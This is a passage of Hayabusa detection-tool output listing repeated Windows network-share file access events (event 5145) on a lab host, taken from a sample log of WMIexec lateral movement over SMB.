+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2bac6884# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2bac6884#\26a1a0abca839c13b1337a076531d7a2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d29a719# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d29a719#\d0b3dad21720f265098f1e94984349f8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d6979e4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d6979e4#\3e37b5062bf0419283b3384af5deb445 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2ded559f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2ded559f#\7d512c9625a371ff23fac5628a0e68f9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.953 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W3cdb5602# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.953 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W3cdb5602#\6423a4306ce0876f0093a7f421bb7e5a | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6c95e797# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6c95e797#\8780975ab811e02b5246582c27ea6cda | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6dcfceb1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6dcfceb1#\64783b930c916ed9a5041885582dd1f1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W7b7c0837# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W7b7c0837#\fa70f9411efd4c4e624a68d30b61b1b7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e7db7c5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e7db7c5#\129a7094f09543b72571da3208c88188 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e8926d3# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e8926d3#\86d7c67af3a964bb8d312cffb20064f4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W15cd0137# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W15cd0137#\37435834252683aa469b56ff5b1fa582 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W37d1a032# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W37d1a032#\3000cd8689f492cfebdd90745d8ff4f5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W39c436dd# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W39c436dd#\1e419fc634fa508e323ce21b5ed38e24 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W69ef49d2# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W69ef49d2#\3904c1c8a3c65252ed404558b48ebbc1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W71daf281# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W71daf281#\4dc6f876453e5e2ebf2a9ee674543449 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W81a3882f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W81a3882f#\a85f95161dcf12987a79a1b41adbdb9c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W708fc392# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W708fc392#\8f2dcf5025667bf632e62398c422a6da | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W5052cbb1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W5052cbb1#\3d4dc36b565611250515cd25ebe64bed | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W57798b05# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W57798b05#\a9ccbdffc3a6a0fca980872c1531aa02 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W73044bb5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W73044bb5#\ca9e965c5eab4b76dc40c510a6a4a916 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W193497eb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W193497eb#\2ebfdca668bed840047e6bcbeec44e53 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W08054466# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W08054466#\728711ada9b68483d998f34ac723c295 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad38fd8b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad38fd8b#\9158e541821e2b6d43c32648464e77c2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.079 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad78daf4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.079 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad78daf4#\81b597084cf1f78a1957cf8138744f32 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.096 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d030b7# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d030b7#\fa5c1a0df187c30480b0623065a70395 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.099 